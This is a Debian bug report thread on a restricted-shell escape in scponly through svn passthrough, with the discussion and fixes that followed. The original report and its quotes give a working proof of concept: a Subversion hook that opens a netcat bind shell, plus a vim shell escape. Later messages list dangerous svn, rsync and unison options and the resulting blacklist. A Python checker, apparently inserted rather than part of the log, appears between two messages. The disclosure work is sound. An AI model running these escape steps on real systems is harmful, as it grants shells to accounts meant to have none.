Debian Bug report logs - #437148
"svn", "svnserve", "unison", "rsync" passthrough is unsafe

Package: scponly; Maintainer for scponly is Thomas Wana <greuff@debian.org>;

Reported by: Joachim Breitner <nomeata@debian.org>

Date: Fri, 10 Aug 2007 17:57:01 UTC

Severity: grave

Tags: security

Found in version scponly/4.6-1

Fixed in versions scponly/4.6-1.1, scponly/4.6-1etch1, scponly/4.0-1sarge2

Done: Florian Weimer <fw@deneb.enyo.de>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, wheat@debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly.

Acknowledgement sent to Joachim Breitner <nomeata@debian.org>:
New Bug report received and forwarded. Copy sent to wheat@debian.org, Thomas Wana <greuff@debian.org>.

Message #5 received at submit@bugs.debian.org:

From: Joachim Breitner <nomeata@debian.org>
To: submit@bugs.debian.org
Subject: Security Hole in scponly, due to svn support
Date: Fri, 10 Aug 2007 19:54:43 +0200
Package: scponly
Version: 4.6-1
X-Debbugs-CC: wheat@debian.org
Severity: grave
Tags: security

Hi Thomas Wana,

messing around with some friends here, I tried to access his computer
with only a scponly protected account. I discovered this way of gaining
full shell access:

I locally created a subversion repository /tmp/blubb with
a /tmp/blubb/hooks/post-commit that contains the command:
        ( nc -l -p 1042 -e /bin/bash) &
I copy this repository using
        scp -r /tmp/blubb/ user@host:
Then I check out the repository remotely:
        ssh user@host /usr/bin/svn co file:///home/user/blubb bla
Now I add a file and commit it:
        touch blah
        scp blah user@host:bla/
        ssh user@host /usr/bin/svn ci bla
At this point, I have a vim instance running, asking me for the commit
message. I could now just run
        :!/bin/bash
to get a shell, but having done the post-commit hook already, I want to
use that, so I write something and quit the editor with :x

At this point, I can use
        nc host 1042
and I have a shell for the account that should have none.

The solution would be: Do not enable access to svn
(or svnserve), which is a simple compilation option. I’d appreciate it
if this gets fixed in debian etch.

I have sent this information to security@debian.org and scponly’s
upstream maintainer last week, but have not yet gotten a response.

Greetings,
Joachim


-- 
Joachim "nomeata" Breitner
Debian Developer
  nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata


Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>.

Message #10 received at 437148@bugs.debian.org:

From: Florian Weimer <fw@deneb.enyo.de>
To: Joachim Breitner <nomeata@debian.org>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 12 Aug 2007 07:58:14 +0200
* Joachim Breitner:

> messing around with some friends here, I tried to access his computer
> with only a scponly protected account. I discovered this way of gaining
> full shell access:
>
> I locally created a subversion repository /tmp/blubb with
> a /tmp/blubb/hooks/post-commit that contains the command:
>         ( nc -l -p 1042 -e /bin/bash) &

This is an unfortunate interaction between scponly and Subversion, but
not a real bug in any of the programs.  The same problem arises when a
scponly-restricted user uploads any form of executable contents.  CGI
scripts are more common (and their so-called "PHP shells" which are
explicitly designed to exploit this).



Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly.

Acknowledgement sent to Joachim Breitner <nomeata@debian.org>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>.

Message #15 received at 437148@bugs.debian.org:

From: Joachim Breitner <nomeata@debian.org>
To: Florian Weimer <fw@deneb.enyo.de>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 12 Aug 2007 13:03:28 +0200
Hi,

On Sunday, 12.08.2007, 07:58 +0200, Florian Weimer wrote:
> * Joachim Breitner:
> 
> > messing around with some friends here, I tried to access his computer
> > with only a scponly protected account. I discovered this way of gaining
> > full shell access:
> >
> > I locally created a subversion repository /tmp/blubb with
> > a /tmp/blubb/hooks/post-commit that contains the command:
> >         ( nc -l -p 1042 -e /bin/bash) &
> 
> This is an unfortunate interaction between scponly and Subversion, but
> not a real bug in any of the programs.  The same problem arises when a
> scponly-restricted user uploads any form of executable contents.  CGI
> scripts are more common (and their so-called "PHP shells" which are
> explicitly designed to exploit this).

I think it’s more than that. If I upload some executable, I still have
to find a way to actually execute it (e.g. a badly configured web
server). Using subversion, I execute anything in _any case_, making
scponly useless for its purpose.

Greetings,
Joachim

-- 
Joachim "nomeata" Breitner
Debian Developer
  nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata




Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#437148; Package scponly.

Acknowledgement sent to Thomas Wana <greuff@debian.org>:
Extra info received and forwarded to list.

Message #20 received at 437148@bugs.debian.org:

From: Thomas Wana <greuff@debian.org>
To: Joachim Breitner <nomeata@debian.org>, 437148@bugs.debian.org
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 2 Sep 2007 17:49:15 +0200
Hi Joachim,

On 10.08.2007, at 19:54, Joachim Breitner wrote:

> Package: scponly
> Version: 4.6-1
> X-Debbugs-CC: wheat@debian.org
> Severity: grave
> Tags: security
>
> Hi Thomas Wana,
>
> messing around with some friends here, I tried to access his computer
> with only a scponly protected account. I discovered this way of gaining
> full shell access:
>

Nice and creative way :-)
Can you please get in touch with the scponly-mailinglist,
this should be discussed there and fixed upstream.

Tom

> I locally created a subversion repository /tmp/blubb with
> a /tmp/blubb/hooks/post-commit that contains the command:
>         ( nc -l -p 1042 -e /bin/bash) &
> I copy this repository using
>         scp -r /tmp/blubb/ user@host:
> Then I check out the repository remotely:
>         ssh user@host /usr/bin/svn co file:///home/user/blubb bla
> Now I add a file and commit it:
>         touch blah
>         scp blah user@host:bla/
>         ssh user@host /usr/bin/svn ci bla
> At this point, I have a vim instance running, asking me for the commit
> message. I could now just run
>         :!/bin/bash
> to get a shell, but having done the post-commit hook already, I want to
> use that, so I write something and quit the editor with :x
>
> At this point, I can use
>         nc host 1042
> and I have a shell for the account that should have none.
>
> The solution would be: Do not enable access to svn
> (or svnserve), which is a simple compilation option. I’d appreciate it
> if this gets fixed in debian etch.
>
> I have sent this information to security@debian.org and scponly’s
> upstream maintainer last week, but have not yet gotten a response.
>
> Greetings,
> Joachim
>
>
> -- 
> Joachim "nomeata" Breitner
> Debian Developer
>   nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
>   JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata
>




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>.

Message #25 received at 437148@bugs.debian.org:

From: Florian Weimer <fw@deneb.enyo.de>
To: Joachim Breitner <nomeata@debian.org>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 02 Sep 2007 18:29:15 +0200
* Joachim Breitner:

>> This is an unfortunate interaction between scponly and Subversion, but
>> not a real bug in any of the programs.  The same problem arises when a
>> scponly-restricted user uploads any form of executable contents.  CGI
>> scripts are more common (and their so-called "PHP shells" which are
>> explicitly designed to exploit this).
>
> I think it’s more than that. If I upload some executable, I still have
> to find a way to actually execute it (e.g. a badly configured web
> server). Using subversion, I execute anything in _any case_, making
> scponly useless for its purpose.

You need write permission on the Subversion repository.  I think it's
pretty obvious that you can change the Subversion hook scripts once
you've got them.

There are tons of programs which will lead to a similar
situation--basically anything that reads a user-specific
configuration file.



Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly.

Acknowledgement sent to Joachim Breitner <nomeata@debian.org>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>.

Message #30 received at 437148@bugs.debian.org:

From: Joachim Breitner <nomeata@debian.org>
To: Florian Weimer <fw@deneb.enyo.de>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 02 Sep 2007 20:25:05 +0200
Hi,

On Sunday, 02.09.2007, 18:29 +0200, Florian Weimer wrote:
> * Joachim Breitner:
> 
> >> This is an unfortunate interaction between scponly and Subversion, but
> >> not a real bug in any of the programs.  The same problem arises when a
> >> scponly-restricted user uploads any form of executable contents.  CGI
> >> scripts are more common (and their so-called "PHP shells" which are
> >> explicitly designed to exploit this).
> >
> > I think it’s more than that. If I upload some executable, I still have
> > to find a way to actually execute it (e.g. a badly configured web
> > server). Using subversion, I execute anything in _any case_, making
> > scponly useless for its purpose.
> 
> You need write permission on the Subversion repository.  I think it's
> pretty obvious that you can change the Subversion hook scripts once
> you've got them.
> 
> There are tons of programs which will lead to a similar
> situation--basically anything that reads a user-specific
> configuration file.

Note that every user can create a subversion repository.

Greetings,
Joachim

-- 
Joachim "nomeata" Breitner
Debian Developer
  nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>.

Message #35 received at 437148@bugs.debian.org:

From: Florian Weimer <fw@deneb.enyo.de>
To: Joachim Breitner <nomeata@debian.org>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 02 Sep 2007 20:27:59 +0200
* Joachim Breitner:

>> You need write permission on the Subversion repository.  I think it's
>> pretty obvious that you can change the Subversion hook scripts once
>> you've got them.
>> 
>> There are tons of programs which will lead to a similar
>> situation--basically anything that reads a user-specific
>> configuration file.
>
> Note that every user can create a subversion repository.

So what?  You still need a second channel to access that repository
using the Subversion protocol.  scponly access alone is not
sufficient.



Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly.

Acknowledgement sent to Joachim Breitner <nomeata@debian.org>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>.

Message #40 received at 437148@bugs.debian.org:

From: Joachim Breitner <nomeata@debian.org>
To: Florian Weimer <fw@deneb.enyo.de>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 02 Sep 2007 20:30:09 +0200
Hi,

On Sunday, 02.09.2007, 20:27 +0200, Florian Weimer wrote:
> * Joachim Breitner:
> 
> >> You need write permission on the Subversion repository.  I think it's
> >> pretty obvious that you can change the Subversion hook scripts once
> >> you've got them.
> >> 
> >> There are tons of programs which will lead to a similar
> >> situation--basically anything that reads a user-specific
> >> configuration file.
> >
> > Note that every user can create a subversion repository.
> 
> So what?  You still need a second channel to access that repository
> using the Subversion protocol.  scponly access alone is not
> sufficient.

It is, as you can run “svn” in the scponly shell, in Debian’s current
configuration. If in doubt, please re-try the steps I took in the
original report.

Greetings,
Joachim
-- 
Joachim "nomeata" Breitner
Debian Developer
  nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata




Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#437148; Package scponly.

Acknowledgement sent to Thomas Wana <greuff@debian.org>:
Extra info received and forwarded to list.

Message #45 received at 437148@bugs.debian.org:

From: Thomas Wana <greuff@debian.org>
To: Florian Weimer <fw@deneb.enyo.de>, 437148@bugs.debian.org
Cc: Joachim Breitner <nomeata@debian.org>
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 2 Sep 2007 20:30:58 +0200
On 02.09.2007, at 18:29, Florian Weimer wrote:

> * Joachim Breitner:
>
>>> This is an unfortunate interaction between scponly and Subversion, but
>>> not a real bug in any of the programs.  The same problem arises when a
>>> scponly-restricted user uploads any form of executable contents.  CGI
>>> scripts are more common (and their so-called "PHP shells" which are
>>> explicitly designed to exploit this).
>>
>> I think it’s more than that. If I upload some executable, I still have
>> to find a way to actually execute it (e.g. a badly configured web
>> server). Using subversion, I execute anything in _any case_, making
>> scponly useless for its purpose.
>
> You need write permission on the Subversion repository.  I think it's
> pretty obvious that you can change the Subversion hook scripts once
> you've got them.

But you can upload a private repository, trigger the hook
and remove it afterwards.

I believe this is a real security problem, and I'm not
quite sure how to fix this without disabling subversion
support. But granted, I wouldn't call it a bug, either.
It's no flaw in any of the programs involved, rather it
is a constellation no one thought of before.

>
> There are tons of programs which will lead to a similar
> situation--basically anything that reads a user-specific
> configuration file.

Well, reading a file is harmless compared to running
arbitrary scripts.

Tom





Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>.

Message #50 received at 437148@bugs.debian.org:

From: Florian Weimer <fw@deneb.enyo.de>
To: Joachim Breitner <nomeata@debian.org>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 02 Sep 2007 20:49:31 +0200
retitle 437148 "svn", "svnserve" command passthrough is unsafe
thanks

* Joachim Breitner:

>> So what?  You still need a second channel to access that repository
>> using the Subversion protocol.  scponly access alone is not
>> sufficient.
>
> It is, as you can run “svn” in the scponly shell, in Debian’s current
> configuration. If in doubt, please re-try the steps I took in the
> original report.

Ah, I see.  Passing through plain "svn" commands is a really, really
stupid thing to do.  I couldn't imagine scponly doing this.

Other holes introduced by "svn" pass-through:

  svn checkout (write arbitrary files)
  svn diff --diff-cmd (arbitrary command execution)
  svn export (write arbitrary files)
  svn propedit --editor-cmd (arbitrary command execution)

And likely a few more.

Your example shows that "svnserve" isn't safe, either.



Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>.

Message #55 received at 437148@bugs.debian.org:

From: Florian Weimer <fw@deneb.enyo.de>
To: Joachim Breitner <nomeata@debian.org>
Cc: 437148@bugs.debian.org, control@bugs.debian.org
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 02 Sep 2007 21:31:09 +0200
* Florian Weimer:
retitle 437148 "svn", "svnserve", "unison", "rsync" passthrough is unsafe
thanks

>   svn checkout (write arbitrary files)
>   svn export (write arbitrary files)

These two are non-issues because scponly relies on UNIX permissions to
restrict write access.

> Your example shows that "svnserve" isn't safe, either.

Similar tricks can be played with rsync (create an rsyncd.conf with a
pre-xfer exec or post-xfer exec option; start a daemon, and connect to
it) and unison (provided that you can create files in ~/.unison, which
is quite likely).



Changed Bug title to `"svn", "svnserve", "unison", "rsync" passthrough is unsafe' from `Security Hole in scponly, due to svn support'. Request was from Florian Weimer <fw@deneb.enyo.de> to control@bugs.debian.org. (Sun, 02 Sep 2007 19:33:05 GMT)

Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly.

Acknowledgement sent to Joachim Breitner <nomeata@debian.org>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>.

Message #62 received at 437148@bugs.debian.org:

From: Joachim Breitner <nomeata@debian.org>
To: scponly@lists.ccs.neu.edu
Cc: wby oblyr <joe@sublimation.org>, 437148@bugs.debian.org
Subject: Re: [scponly] svn support in scponly is unsafe
Date: Tue, 04 Sep 2007 20:23:11 +0000
Hi,

On Tuesday, 04.09.2007, 13:10 -0700, Kaleb Pederson wrote:
> Yes, you are exactly right.  This was discovered a while ago and documented in 
> our SECURITY document currently only in CVS.  You can see it here:
> 
> http://scponly.cvs.sourceforge.net/scponly/scponly/SECURITY?revision=1.1&view=markup
> 
> We have debated whether or not support for svn and svnserve should be removed 
> entirely or if it should be controllable by the system administrator.  As the 
> OS can be configured to safely allow svn/svnserve, I think we leaned towards 
> making it obvious what the ramifications of the different options are and 
> leaving it up to the discretion of the system administrator.  For instances 
> where the svn repository is actually controlled by the administrator, this 
> makes perfect sense.
> 
> Please forgive us that this wasn't brought to the attention of the community 
> earlier, unfortunately our time limits us more than we like.
> 
> Community members, please let us know what your feelings on this are so that 
> we have as few surprises as possible with our next release.

I assume then that svn/svnserve support is by default off in the
original package and that the Debian package should also not have
svn/svnserve support.

Greetings,
Joachim
-- 
Joachim "nomeata" Breitner
Debian Developer
  nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly.

Acknowledgement sent to Joachim Breitner <nomeata@debian.org>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>.

Message #67 received at 437148@bugs.debian.org:

From: Joachim Breitner <nomeata@debian.org>
To: Kaleb Pederson <kibab@icehouse.net>, 437148@bugs.debian.org
Subject: Re: [scponly] svn support in scponly is unsafe
Date: Tue, 04 Sep 2007 20:41:02 +0000
Hi Kaleb,

just replying to get the mail into the Debian BTS. Please keep
437148@bugs.debian.org in the CC about this topic.

I’m not testing these now, but maybe the scponly package maintainer
will.

Greetings,
Joachim

On Tuesday, 04.09.2007, 13:38 -0700, Kaleb Pederson wrote:
> Hello,
> 
> If you are familiar with rsync and unison and use them with scponly, please 
> take a look at the comments at the bottom of the bug report and test with the 
> latest CVS -- specifically options that use configuration files that can't be 
> identified on the command line.  I had trouble finding adequate documentation 
> on unison, so testing in that area is appreciated.
> 
> Aside from specifying which commands might have the right to execute by using 
> an LD_PRELOAD mechanism, I'm not sure if there is much that can be done.
> 
> We have fairly recently refined the rsync support to disallow starting it as a 
> daemon, and a few other things that could also cause problems, so I believe 
> it won't accept a config file on the command line, etc., and I believe it to 
> be safe at this point.
> 
> Furthermore, in light of comments on the debian list, I just 
> disallowed --editor-cmd, --diff-cmd, and --config-dir... but that still 
> doesn't help with the editor cmd and diff cmd being specified in config 
> files.
> 
> As far as we know, a system secured using the practices set forth in the 
> security guide will be secure.  If there are other best practices that can be 
> added to it, or you have other suggestions and/or comments, please let us 
> know.
> 
> Thanks.
> 
> --Kaleb
> 
> On Tuesday 04 September 2007, Joachim Breitner wrote:
> > Hi,
> >
> > please read through:
> > http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=437148
> >
> > Basically: Allowing svn or svnserve is unsafe.
> >
> > Greetings,
> > Joachim
> 
-- 
Joachim "nomeata" Breitner
Debian Developer
  nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>.

Message #72 received at 437148@bugs.debian.org:

From: Florian Weimer <fw@deneb.enyo.de>
To: Joachim Breitner <nomeata@debian.org>
Cc: 437148@bugs.debian.org, Kaleb Pederson <kibab@icehouse.net>
Subject: Re: Bug#437148: [scponly] svn support in scponly is unsafe
Date: Thu, 06 Sep 2007 19:51:22 +0200
>> Furthermore, in light of comments on the debian list, I just 
>> disallowed --editor-cmd, --diff-cmd, and --config-dir... but that still 
>> doesn't help with the editor cmd and diff cmd being specified in config 
>> files.

--diff3-cmd is problematic, too.  For rsync, you need to disable
daemon mode (at the very least).

The security guide must mention that you need to lock down
~/.subversion, ~/.ssh, ~/.unison and maybe a few more directories.



Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly.

Acknowledgement sent to Kaleb Pederson <kibab@icehouse.net>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>.

Message #77 received at 437148@bugs.debian.org:

From: Kaleb Pederson <kibab@icehouse.net>
To: Florian Weimer <fw@deneb.enyo.de>
Cc: Joachim Breitner <nomeata@debian.org>, 437148@bugs.debian.org, wby oblyr <joe@sublimation.org>
Subject: Re: Bug#437148: [scponly] svn support in scponly is unsafe
Date: Fri, 7 Sep 2007 00:45:50 -0700
Thanks Florian,

The following are now disabled for svn:

"editor-cmd",
"diff-cmd",
"diff3-cmd", (just added)
"config-dir",

The following are disabled for svnserve:

"daemon",
"listen-port",
"listen-host",
"foreground",
"inetd",
"threads",
"listen-once",

The following for rsync:

"rsh",
"daemon",
"rsync-path", (this and below just added)
"address",
"port",
"sockopts",
"config",
"no-detach",

And the following for unison:

"-rshcmd",
"-sshcmd",
"-servercmd",
"-addversionno" (just added)

Where documented, the respective short options for the above are disabled.  I 
updated the security document to include the changes you recommend, and then 
a couple of others that come to mind.  The latest version of the security 
document is available here:

http://scponly.cvs.sourceforge.net/scponly/scponly/SECURITY?view=markup

We'll continue to look at it and see if there is anything else that we missed.  
Thanks again for the help.

--Kaleb

On Thursday 06 September 2007, Florian Weimer wrote:
> >> Furthermore, in light of comments on the debian list, I just
> >> disallowed --editor-cmd, --diff-cmd, and --config-dir... but that still
> >> doesn't help with the editor cmd and diff cmd being specified in config
> >> files.
>
> --diff3-cmd is problematic, too.  For rsync, you need to disable
> daemon mode (at the very least).
>
> The security guide must mention that you need to lock down
> ~/.subversion, ~/.ssh, ~/.unison and maybe a few more directories.
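Added example (not scponly's own code) that models the option blacklist Kaleb lists above, together with the check Florian's message #72 calls for: the per-user config directories that no argument filter can see. The short-option aliases (svnserve -d/-i/-T/-X, rsync -e) and unison's single-dash convention are assumptions taken from the tools' man pages; the `__main__` block shows that the commands from the original report pass the filter untouched, because the hook lives inside the uploaded repository rather than on the command line.

```python
"""Model of the option blacklist from message #77, plus a check for the residual
risk the thread points out (messages #72 and #82): hooks and config-file settings
that no argument filter can see. Added illustration, not scponly's own code."""
import os
import shlex
import stat

# Long options denied per passthrough command, as listed in message #77.
DENIED_LONG = {
    "svn": {"editor-cmd", "diff-cmd", "diff3-cmd", "config-dir"},
    "svnserve": {"daemon", "listen-port", "listen-host", "foreground",
                 "inetd", "threads", "listen-once"},
    "rsync": {"rsh", "daemon", "rsync-path", "address", "port",
              "sockopts", "config", "no-detach"},
    "unison": {"rshcmd", "sshcmd", "servercmd", "addversionno"},
}
# Single-letter forms of some denied options. Assumption: taken from the tools'
# man pages (svnserve -d/-i/-T/-X, rsync -e), not from scponly's source.
DENIED_SHORT = {
    "svnserve": {"d": "daemon", "i": "inetd", "T": "threads", "X": "listen-once"},
    "rsync": {"e": "rsh"},
}
SINGLE_DASH_LONG = {"unison"}  # unison spells long options "-rshcmd"
# Per-user directories message #72 says must be locked down.
CONFIG_DIRS = (".subversion", ".ssh", ".unison")


def denied_option(command, argv):
    """Return the first denied option in argv, or None if the arguments are clean.

    Fails closed: a denied letter anywhere in a short-option cluster ("-ave")
    is reported even if it could have been the operand of an earlier flag."""
    long_denied = DENIED_LONG.get(command, set())
    short_denied = DENIED_SHORT.get(command, {})
    for arg in argv:
        if arg == "--":
            break  # everything after "--" is an operand, not an option
        if arg.startswith("--"):
            name = arg[2:].split("=", 1)[0]  # "--diff-cmd=x" and "--diff-cmd x"
            if name in long_denied:
                return "--" + name
        elif arg.startswith("-") and len(arg) > 1:
            name = arg[1:]
            if command in SINGLE_DASH_LONG:
                if name in long_denied:
                    return arg
            else:
                for letter in name:
                    if letter in short_denied:
                        return "-%s (--%s)" % (letter, short_denied[letter])
    return None


def check_command_line(line):
    """Filter a full command line as sshd hands it to the shell; returns (allowed, reason)."""
    argv = shlex.split(line)
    if not argv:
        return False, "empty command"
    command = os.path.basename(argv[0])
    if command not in DENIED_LONG:
        return False, "not a passthrough command: " + command
    hit = denied_option(command, argv[1:])
    if hit is not None:
        return False, "%s option denied: %s" % (command, hit)
    return True, "ok"


def unlocked_config_dirs(home, uid):
    """Return the CONFIG_DIRS under home that the account with this uid still controls.

    Unlocked means: the user owns it (an owner can always chmod it back, so the
    mode alone is no protection), it is world-writable, or it is missing while
    the user owns home and can simply create it. Group write bits are ignored."""
    home_owned = os.stat(home).st_uid == uid
    unlocked = []
    for name in CONFIG_DIRS:
        path = os.path.join(home, name)
        if not os.path.lexists(path):
            if home_owned:
                unlocked.append(name)
            continue
        try:
            link_st, st = os.lstat(path), os.stat(path)
        except FileNotFoundError:
            unlocked.append(name)  # dangling symlink: treat as user-controlled
            continue
        if uid in (link_st.st_uid, st.st_uid) or st.st_mode & stat.S_IWOTH:
            unlocked.append(name)
    return unlocked


if __name__ == "__main__":
    # The commands from the original report carry no denied option at all: the
    # hook lives inside the uploaded repository, so the filter passes them and
    # only a noexec mount or a directory lockdown can help.
    print(check_command_line("/usr/bin/svn co file:///home/user/blubb bla"))
    print(check_command_line("rsync -ave ssh src user@host:dst"))
    print(unlocked_config_dirs(os.path.expanduser("~"), os.getuid()))
```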



Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly.

Acknowledgement sent to Joachim Breitner <nomeata@debian.org>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>.

Message #82 received at 437148@bugs.debian.org:

From: Joachim Breitner <nomeata@debian.org>
To: Kaleb Pederson <kibab@icehouse.net>
Cc: Florian Weimer <fw@deneb.enyo.de>, 437148@bugs.debian.org, wby oblyr <joe@sublimation.org>
Subject: Re: Bug#437148: [scponly] svn support in scponly is unsafe
Date: Fri, 07 Sep 2007 10:31:13 +0200
Hi,

On Friday, 07.09.2007, 00:45 -0700, Kaleb Pederson wrote:
> Thanks Florian,
> 
> The following are now disabled for svn:
> 
> "editor-cmd",
> "diff-cmd",
> "diff3-cmd", (just added)
> "config-dir",

But that does not prevent committing to a repository with hooks, right?
You write in the security docs:

> These files have specific filenames at specific locations relative to
> the svn repository root.

But since I can put a repository _anywhere_ by just copying it there,
how do you want the admin to prevent the user running its hook
commands?

Greetings,
Joachim
-- 
Joachim "nomeata" Breitner
Debian Developer
  nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>.

Message #87 received at 437148@bugs.debian.org:

From: Florian Weimer <fw@deneb.enyo.de>
To: Joachim Breitner <nomeata@debian.org>
Cc: Kaleb Pederson <kibab@icehouse.net>, 437148@bugs.debian.org, wby oblyr <joe@sublimation.org>
Subject: Re: Bug#437148: [scponly] svn support in scponly is unsafe
Date: Fri, 07 Sep 2007 10:49:29 +0200
* Joachim Breitner:

>> These files have specific filenames at specific locations relative to
>> the svn repository root.
>
> But since I can put a repository _anywhere_ by just copying it there,
> how do you want the admin to prevent the user running its hook
> commands?

I think mounting the file system no-exec covers that.  IIRC,
Subversion directly executes the hook scripts, and this will fail in
that case.



Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly.

Acknowledgement sent to Joachim Breitner <nomeata@debian.org>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>.

Message #92 received at 437148@bugs.debian.org:

From: Joachim Breitner <nomeata@debian.org>
To: Florian Weimer <fw@deneb.enyo.de>
Cc: Kaleb Pederson <kibab@icehouse.net>, 437148@bugs.debian.org, wby oblyr <joe@sublimation.org>
Subject: Re: Bug#437148: [scponly] svn support in scponly is unsafe
Date: Fri, 07 Sep 2007 10:56:11 +0200
On Friday, 07.09.2007, 10:49 +0200, Florian Weimer wrote:
> * Joachim Breitner:
> 
> >> These files have specific filenames at specific locations relative to
> >> the svn repository root.
> >
> > But since I can put a repository _anywhere_ by just copying it there,
> > how do you want the admin to prevent the user running its hook
> > commands?
> 
> I think mounting the file system no-exec covers that.  IIRC,
> Subversion directly executes the hook scripts, and this will fail in
> that case.

Then this should be mentioned in the file. I also think that this is
quite a high hurdle: Admins that want that can surely re-compile
scponly. For the rest, the debian package should come without svn
support. The README.Debian could describe the disabled features, and
under what circumstances they are safe, and how best to recompile
scponly.

Greetings,
Joachim

-- 
Joachim "nomeata" Breitner
Debian Developer
  nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #97 received at 437148@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: Joachim Breitner <nomeata@debian.org>
Cc: Kaleb Pederson <kibab@icehouse.net>, 437148@bugs.debian.org, wby oblyr <joe@sublimation.org>
Subject: Re: Bug#437148: [scponly] svn support in scponly is unsafe
Date: Fri, 07 Sep 2007 10:59:07 +0200
* Joachim Breitner:

>> I think mounting the file system no-exec covers that.  IIRC,
>> Subversion directly executes the hook scripts, and this will fail in
>> that case.
>
> Then this should be mentioned in the file. I also think that this is
> quite a high hurdle: Admins that want that can surely re-compile
> scponly.

It's mentioned in the file (item 7), but I agree that this is not the
target group of the Debian package.

